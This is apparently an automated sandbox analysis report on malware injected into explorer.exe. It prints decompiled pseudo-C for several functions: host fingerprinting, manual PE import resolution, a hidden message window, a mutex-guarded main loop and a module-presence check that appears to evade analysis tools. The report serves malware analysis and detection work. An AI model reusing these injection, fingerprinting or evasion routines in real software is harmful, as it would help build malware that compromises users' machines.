GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B822
lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B831
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B863

Part of subcall function 00089621: _vsnwprintf.MSVCRT ref: 0008963E

lstrcatW.KERNEL32 ref: 0008B89C
CharUpperBuffW.USER32(?,00000000), ref: 0008B8AE

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: 9e9cc355a111bd2f8d3623ebb3aab38fc93188089e2077968ceb5f2c82d5f541
Instruction ID: f8b7a3c1acc05bd70a14cdd091a009b2ed4efedbd8d29cf780882ed056f74b26
Opcode Fuzzy Hash: 9e9cc355a111bd2f8d3623ebb3aab38fc93188089e2077968ceb5f2c82d5f541
Instruction Fuzzy Hash: F92132B2A40218BFE710ABA4DC4AFEE77BCEB84310F108165F606D6182EE745E448B60

Uniqueness

Uniqueness Score: -1.00%

Function 0008CFC6, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0008CFC6(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x9e688; // 0xb0000
				GetCurrentProcess();
				_t11 = E0008BA47(); // executed
				_t1 = _t29 + 0x1644; // 0xb1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00088F9F(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xb0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00088F9F(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E0008E3F8(_t3);
				_t7 = _t29 + 0x220; // 0xb0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E0008E433(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x0008cfc9
0x0008cfcb
0x0008cfd2
0x0008cfda
0x0008cfe4
0x0008cfe4
0x0008cfea
0x0008cff3
0x0008cff9
0x0008cffb
0x0008cfff
0x0008cfff
0x0008d004
0x0008d00a
0x0008d01a
0x0008d024
0x0008d02c
0x0008d02f
0x0008d03b
0x0008d041
0x0008d046
0x0008d04c
0x0008d052
0x0008d058
0x0008d060

APIs

GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083538), ref: 0008CFD2
GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083538), ref: 0008CFF3
memset.MSVCRT ref: 0008D024
GetVersionExA.KERNEL32(000B0000,000B0000,?,00083538), ref: 0008D02F
GetCurrentProcessId.KERNEL32(?,00083538), ref: 0008D035

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: 1cd997e0c49c8d550cc113d255d71e0cd1cb7d24bfe504b15f1c23ad715fa88f
Instruction ID: cb89313106e779ecfc1c3035e56e170423fe5477c83872d01a42d9a1b9676586
Opcode Fuzzy Hash: 1cd997e0c49c8d550cc113d255d71e0cd1cb7d24bfe504b15f1c23ad715fa88f
Instruction Fuzzy Hash: C2015E70901B00ABE720BF70DC0ABDA7BE5FF85310F04082EE59687292EF746545CB54

Uniqueness

Uniqueness Score: -1.00%

Function 000924D3, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E000924D3(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0008E0DB(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x000924d9
0x000924e1
0x000924f6
0x00092508
0x00092514
0x0009251a
0x0009251f
0x0009252b
0x00092696
0x00000000
0x00092696
0x00092531
0x0009253a
0x00092548
0x0009254b
0x0009255a
0x0009255a
0x00092561
0x0009256f
0x00092572
0x00092589
0x0009258f
0x00092596
0x000925a6
0x000925be
0x000925a8
0x000925b0
0x000925b0
0x000925c1
0x000925c5
0x000925d1
0x000925d5
0x000925d9
0x000925dd
0x000925e9
0x00092614
0x0009261c
0x0009262e
0x0009263a
0x000925eb
0x000925f0
0x000925fb
0x00092607
0x00092607
0x00092643
0x00092649
0x00092653
0x0009266f
0x00092655
0x00092664
0x00092664
0x00092653
0x00092677
0x00092680
0x00092680
0x0009268e
0x00000000
0x0009268e
0x0009259a
0x00000000
0x0009259a
0x00000000
0x00092572
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924F0
LoadLibraryA.KERNEL32(00000000), ref: 00092589

Strings

GetProcAddress, xrefs: 000924F9
kernel32.dll, xrefs: 000924EB

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 2352adce6c389be8d2c2806daa3e9ea874876bb92571272c60ceabb1c7462c04
Instruction ID: 88f258000fc7a8f5536618daea2d87f2d1ab54c546ac18223be640e1c38ae54b
Opcode Fuzzy Hash: 2352adce6c389be8d2c2806daa3e9ea874876bb92571272c60ceabb1c7462c04
Instruction Fuzzy Hash: EE617C75900209EFDF50CF98C885BADBBF1BF08315F258599E815AB3A1D774AA80EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00082ECD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00082ECD(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0x9e684; // 0x14df8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0x9e688; // 0xb0000
				E0008900E(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E00082E6A;
				_push( &_v52);
				_t32 =  *0x9e694; // 0x14dfa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0x9e718; // 0x30094
					if(_t34 != 0) {
						_t39 =  *0x9e694; // 0x14dfa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0x9e694; // 0x14dfa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0x9e718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0x9e694; // 0x14dfa48
				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
				while(1) {
					_t50 =  *0x9e694; // 0x14dfa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0x9e694; // 0x14dfa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0x9e694; // 0x14dfa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}

0x00082ed6
0x00082ee5
0x00082eec
0x00082ef1
0x00082f0b
0x00082f13
0x00082f20
0x00082f27
0x00082f2d
0x00082f34
0x00082f35
0x00082f3a
0x00082f43
0x00082fc0
0x00082fc0
0x00082fc7
0x00082fca
0x00082fcf
0x00082fcf
0x00082fd2
0x00082fda
0x00082fdf
0x00082fe7
0x00082fe7
0x00082f6a
0x00082f6d
0x00082f74
0x00000000
0x00000000
0x00082f7d
0x00082f80
0x00082f8b
0x00082fad
0x00082fb4
0x00082fb9
0x00082fbe
0x00000000
0x00000000
0x00082f93
0x00000000
0x00000000
0x00082f99
0x00082f9e
0x00082fa5
0x00082faa
0x00082faa
0x00000000

APIs

memset.MSVCRT ref: 00082EEC
CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F6A
ShowWindow.USER32(00000000,00000000), ref: 00082F7D

Strings

0, xrefs: 00082F20

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Window$CreateShowmemset
String ID: 0
API String ID: 3027179219-4108050209
Opcode ID: ad0f521a6fb95b3de76b4301295a1ece28257d3dbbd0c388a8c89c2f074871da
Instruction ID: 682aeab1d2205275c3f3a53d0ee7a0acd4cfd6054749a73bf77ccc7f03983638
Opcode Fuzzy Hash: ad0f521a6fb95b3de76b4301295a1ece28257d3dbbd0c388a8c89c2f074871da
Instruction Fuzzy Hash: C431C7B2500158AFF750DBA8DD85FAA7BFCFB28344F004066B549D71A2D634DD45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00085624, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00085624(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				void* _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E00089E47(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E000897ED(0x9e6c8);
					_t39 = 0x37; // executed
					E00089ED1(_t39);
					_t11 =  *0x9e688; // 0xb0000
					_t40 = 0x3a; // executed
					E00089ED1(_t40); // executed
					E0008E503(_t63);
					_t14 =  *0x9e688; // 0xb0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E0008A8AF( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0x9e684; // 0x14df8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
					 *0x9e74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0x9e76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E000885E5(0x1000);
							_t52 = 0;
							 *0x9e770 = _t34;
							_t49 =  *0x9e774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							__eflags = _t41;
							 *0x9e774 = _t41; // executed
						}
						E00081521(_t41, _t52); // executed
						E000898CF(E00082ECD, 0, __eflags, 0, 0); // executed
						E0008300A(); // executed
						E000831B5(0, __eflags); // executed
						E0008299A(); // executed
						E00083BA5(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0x9e758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E000897ED(0x9e750);
							_push(0x9e750);
							_push(0x9e750); // executed
							E00082784();
							Sleep(0xfa0);
						}
						E00083D27();
						E00089A6F();
						E000834BE();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E00082DBE();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

0x00085624
0x00085630
0x00085639
0x00085644
0x00085649
0x0008565c
0x0008565d
0x00085662
0x00085672
0x00085673
0x0008567b
0x00085680
0x00085685
0x0008568f
0x00085692
0x0008569c
0x000856a4
0x000856aa
0x000856b1
0x000856c3
0x000856c9
0x000856ce
0x000856d0
0x000856d7
0x000856dc
0x000856de
0x000856e4
0x000856ea
0x000856ec
0x000856ec
0x000856ef
0x000856ef
0x000856f5
0x00085703
0x0008570a
0x0008570f
0x00085714
0x00085719
0x00085743
0x00085743
0x00085749
0x00000000
0x00000000
0x00085725
0x0008572a
0x0008572b
0x0008572c
0x0008573d
0x0008573d
0x0008574b
0x00085750
0x00085755
0x0008575a
0x0008575a
0x00000000
0x00000000
0x00000000
0x0008563b
0x0008563b
0x00085640
0x00085642
0x000856b3
0x000856b5
0x00000000
0x00000000
0x00000000
0x00085642
0x00085760

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856C3

Part of subcall function 000897ED: GetSystemTimeAsFileTime.KERNEL32(?,?,00085F90), ref: 000897FA
Part of subcall function 000897ED: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0008981A

Sleep.KERNELBASE(00000FA0), ref: 0008573D

Strings

2]a, xrefs: 00085720
1]a, xrefs: 00085644

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: 2]a$1]a
API String ID: 3249252070-3758487319
Opcode ID: e0db3140d7865bb55b147dfcad1f6e24f8d218589b76e8768a358ea3a1c9e54a
Instruction ID: fcd63d8fa6c83fa0616940b46266237edd7782394f58ce86e90bdbacb149e5f5
Opcode Fuzzy Hash: e0db3140d7865bb55b147dfcad1f6e24f8d218589b76e8768a358ea3a1c9e54a
Instruction Fuzzy Hash: 7A31F9316096409BF724F7B5EC06EEA3B99FF457A0B044126F1C8861A3FE34990087A3

Uniqueness

Uniqueness Score: -1.00%

Function 00084D60, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00084D60(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x9e688; // 0xb0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E0008B7EA(0x9b9c4,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E0008A8AF( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E0008A4B3( &_v556, _t298);
					 *0x9e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E0008E1FE(0x9b9c8, _t299); // executed
						 *0x9e680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000895C2(0x9b9c8);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x9e688; // 0xb0000
						_t127 = E000892C6(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000885B6( &_v612);
						_t130 = E0008B2AB(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E000885FB( &_v616, 0xfffffffe);
						_t133 =  *0x9e688; // 0xb0000
						_t22 = _t133 + 0x114; // 0xb0114
						E000849FE( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x9e688; // 0xb0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x9e680; // 0x14dfda0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E0008E308(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0x9e6b4; // 0x14dfa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E0008E308(_t353,  &_v588);
								_t235 =  *0x9e6b4; // 0x14dfa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x9e73c;
							if( *0x9e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x9e680; // 0x14dfda0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x9e688; // 0xb0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E00084998();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x9e684; // 0x14df8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x9e688; // 0xb0000
											_t184 = E0008FC57(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E000885E5(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E0008109A(_t262, 0x148);
													_t305 =  *0x9e688; // 0xb0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E0008900E(_t271,  &_v572);
													_t272 =  *0x9e688; // 0xb0000
													_t188 = E000860C0( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x9e688; // 0xb0000
														__eflags = _t200 + 0x1020;
														E00089621(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000885B6( &_v636);
														E0008A953(_t333, 0, 0xbb8, 1);
														E000885FB( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E000885FB( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E00084998();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x9e684; // 0x14df8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E000885E5(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000895C2(_t278, 0x32d);
										_t280 =  *0x9e688; // 0xb0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00089621(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000885B6( &_v636);
										E0008A953(_t249, 0, 0xbb8, 1);
										E000885FB( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000895C2(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x9e688; // 0xb0000
								_t329 = E000892C6(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E0008B2AB(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x9e684; // 0x14df8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E000885FB( &_v612, 0xfffffffe);
								}
								E000885B6( &_v616);
								_t150 =  *0x9e688; // 0xb0000
								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
								_t153 =  *0x9e688; // 0xb0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x9e738, 0x105);
								_t331 =  *0x9e688; // 0xb0000
								_t117 = _t331 + 0x228; // 0xb0228
								 *((intOrPtr*)(_t331 + 0x434)) = E00088F9F(_t117, __eflags);
								E000885FB(0x9e740, 0xfffffffe);
								E000885FB(0x9e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000895A8(0x6e2);
				_v616 = _t250;
				_t326 = E000895A8(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000885A3( &_v616);
					_t122 = E000885A3( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

0x00084d60
0x00084d66
0x00084d6c
0x00084d71
0x00084d7f
0x00084d82
0x00084de1
0x00084dea
0x00084df3
0x00084df6
0x00084dfd
0x00084e02
0x00084e07
0x00084e0e
0x00084e18
0x00084e1f
0x00084e25
0x00084e2a
0x00084e2f
0x00084e36
0x00084e3c
0x00084e3e
0x00084e3f
0x00084e43
0x00084e4e
0x00084e53
0x00084e5c
0x00084e61
0x00084e69
0x00084e70
0x00084e71
0x00084e73
0x00084e8f
0x00084e92
0x00084e92
0x00084e9b
0x00084ea0
0x00084eb0
0x00084eb8
0x00084ebd
0x00084ec3
0x00084ec6
0x00084ecc
0x00084eeb
0x00084ef1
0x00084ef2
0x00084ef3
0x00084ef4
0x00084ef5
0x00084ef6
0x00084f00
0x00084f04
0x00084f09
0x00084f0c
0x00084f0e
0x00084f20
0x00084f20
0x00084f22
0x00084f2e
0x00084f33
0x00084f39
0x00084f42
0x00084f45
0x00084f47
0x00084f52
0x00084f57
0x00084f5c
0x00084f61
0x00084f61
0x00084f64
0x00084f6b
0x00000000
0x00084f71
0x00084f71
0x00084f76
0x00084f7a
0x00084f7c
0x00084f7f
0x00084f81
0x00084f87
0x00084f87
0x00084f81
0x00084f89
0x00084f8e
0x00084f94
0x00084f96
0x00000000
0x00084f9c
0x00084f9c
0x00084fa0
0x00085075
0x0008507b
0x00085081
0x0008508c
0x0008508d
0x0008508e
0x0008508f
0x00085095
0x0008509a
0x000850a0
0x000850a8
0x000850ae
0x000850b1
0x000850c0
0x000850c7
0x000850ca
0x000850d7
0x000850db
0x000850e8
0x000850ed
0x000850f0
0x000850f2
0x00085103
0x00085105
0x00085109
0x0008510a
0x0008510c
0x00085117
0x0008511c
0x00085129
0x0008512d
0x0008512e
0x00085130
0x00085138
0x00085139
0x0008513e
0x00085156
0x0008515b
0x0008515e
0x00085162
0x00085164
0x00085177
0x00085181
0x00085185
0x0008518d
0x0008518e
0x00085196
0x00085197
0x0008519c
0x000851a8
0x000851b2
0x000851c4
0x000851d0
0x000851d5
